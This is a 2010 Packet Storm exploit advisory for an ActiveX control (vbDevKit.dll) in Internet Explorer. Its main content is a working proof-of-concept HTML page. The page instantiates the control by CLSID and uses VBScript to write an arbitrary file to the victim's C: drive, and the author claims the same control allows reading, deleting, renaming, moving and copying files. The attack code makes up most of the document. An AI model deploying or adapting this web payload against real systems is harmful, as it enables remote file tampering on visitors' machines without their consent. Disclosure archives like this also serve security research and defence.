Microsoft Internet Explorer vbDevKit.dll Code Execution

2010-01-22T00:00:00
ID PACKETSTORM:85555
Type packetstorm
Reporter ahwak2000
Modified 2010-01-22T00:00:00

Description

                                        
                                            `#######################################################################  
IE vbDevKit.dll ActiveX Control Multti Remote Code Execution  
#######################################################################  
#[+]Date : 22 January 2010  
#[+]version : all versions  
#[+]Author : ahwak2000  
#[+]Contact : z.u5[at]hotmail.com  
#[+]Geetz [2] : germaya_x  
#[+]tested on : windows xp sp2&sp3 EN  
#[+]Reference : http://downloads.securityfocus.com/vulnerabilities/exploits/35725.pl  
#[+]1. Is this for the COMRaider ActiveX bug? yes  
#[+]2. Was this bug discovered by you? yes by me  
#######################################################################  
  
you can Write,Read,Delete,Rename,Move and Copy File  
  
exploit Write file  
  
<html>  
  
<p>  
<object classid='clsid:9A077D0D-B4A6-4EC0-B6CF-98526DF589E4' id='target' ></object>  
  
<script language='vbscript'>  
  
targetFile = "C:\WINDOWS\vbDevKit.dll"  
prototype = "Sub WriteFile ( ByRef path As Variant , ByRef it As Variant )"  
memberName = "WriteFile"  
progid = "vbDevKit.CVariantFileSystem"  
argCount = 2  
arg1="c:\ahwak200.txt"  
arg2="ahwak2000"  
target.WriteFile arg1 ,arg2  
</script></p>  
  
`